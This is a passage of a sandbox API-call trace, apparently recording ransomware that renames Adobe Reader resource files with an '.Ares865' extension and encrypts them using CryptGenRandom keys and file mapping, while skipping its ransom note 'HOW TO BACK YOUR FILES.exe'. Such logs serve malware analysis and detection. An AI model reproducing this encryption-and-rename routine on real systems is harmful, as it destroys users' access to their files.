dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.397] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e11b040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="est.hyp", cAlternateFileName="")) returned 1 [0058.397] lstrcmpiW (lpString1="est.hyp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.397] lstrcmpiW (lpString1="est.hyp", lpString2="aoldtz.exe") returned 1 [0058.397] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\estphon.env.Ares865") returned 107 [0058.397] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\estphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\estphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\estphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\estphon.env.ares865"), dwFlags=0x1) returned 1 [0058.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\estphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\estphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4137) returned 1 [0058.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.399] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.400] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.400] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.400] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1330, lpName=0x0) returned 0x15c [0058.401] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1330) returned 0x190000 [0058.402] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.403] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.403] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.404] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.404] CloseHandle (hObject=0x15c) returned 1 [0058.404] CloseHandle (hObject=0x118) returned 1 [0058.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.405] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.405] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df2be60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fin.hyp", cAlternateFileName="")) returned 1 [0058.405] lstrcmpiW (lpString1="fin.hyp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.405] lstrcmpiW (lpString1="fin.hyp", lpString2="aoldtz.exe") returned 1 [0058.406] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\finphon.env.Ares865") returned 107 [0058.406] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\finphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\finphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\finphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\finphon.env.ares865"), dwFlags=0x1) returned 1 [0058.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\finphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\finphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.407] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3405) returned 1 [0058.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.407] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.408] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.408] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.408] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1050, lpName=0x0) returned 0x15c [0058.410] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1050) returned 0x190000 [0058.411] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.412] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.412] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.412] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.412] CloseHandle (hObject=0x15c) returned 1 [0058.412] CloseHandle (hObject=0x118) returned 1 [0058.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.414] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df05d00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn.fca", cAlternateFileName="")) returned 1 [0058.414] lstrcmpiW (lpString1="frn.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.414] lstrcmpiW (lpString1="frn.fca", lpString2="aoldtz.exe") returned 1 [0058.416] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrvphon.env.Ares865") returned 107 [0058.416] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrvphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrvphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrvphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrvphon.env.ares865"), dwFlags=0x1) returned 1 [0058.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrvphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrvphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.417] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7969) returned 1 [0058.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.417] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.418] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.418] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2230, lpName=0x0) returned 0x15c [0058.420] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2230) returned 0x190000 [0058.421] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.421] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.421] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.422] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.422] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.422] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.422] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.422] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.422] CloseHandle (hObject=0x15c) returned 1 [0058.422] CloseHandle (hObject=0x118) returned 1 [0058.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.424] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e0ced80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hun.fca", cAlternateFileName="")) returned 1 [0058.424] lstrcmpiW (lpString1="hun.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.424] lstrcmpiW (lpString1="hun.fca", lpString2="aoldtz.exe") returned 1 [0058.424] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lavphon.env.Ares865") returned 107 [0058.424] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lavphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lavphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lavphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lavphon.env.ares865"), dwFlags=0x1) returned 1 [0058.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lavphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lavphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.426] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2028) returned 1 [0058.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.426] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.427] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaf0, lpName=0x0) returned 0x15c [0058.428] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf0) returned 0x190000 [0058.429] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.430] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.430] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.430] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.430] CloseHandle (hObject=0x15c) returned 1 [0058.431] CloseHandle (hObject=0x118) returned 1 [0058.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.432] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e0a8c20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lit.hyp", cAlternateFileName="")) returned 1 [0058.432] lstrcmpiW (lpString1="lit.hyp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.432] lstrcmpiW (lpString1="lit.hyp", lpString2="aoldtz.exe") returned 1 [0058.432] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\litphon.env.Ares865") returned 107 [0058.432] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\litphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\litphon.env"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\litphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\litphon.env.ares865"), dwFlags=0x1) returned 1 [0058.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\litphon.env.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\litphon.env.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0058.441] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2648) returned 1 [0058.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.442] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0058.442] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0058.442] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.443] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd60, lpName=0x0) returned 0x15c [0058.444] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd60) returned 0x190000 [0058.445] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0058.445] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0058.445] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.446] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.446] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.446] CloseHandle (hObject=0x15c) returned 1 [0058.446] CloseHandle (hObject=0x118) returned 1 [0058.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.448] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.448] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7de47620, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x47c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw.fca", cAlternateFileName="")) returned 1 [0058.448] lstrcmpiW (lpString1="nrw.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.448] lstrcmpiW (lpString1="nrw.fca", lpString2="aoldtz.exe") returned 1 [0058.449] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | 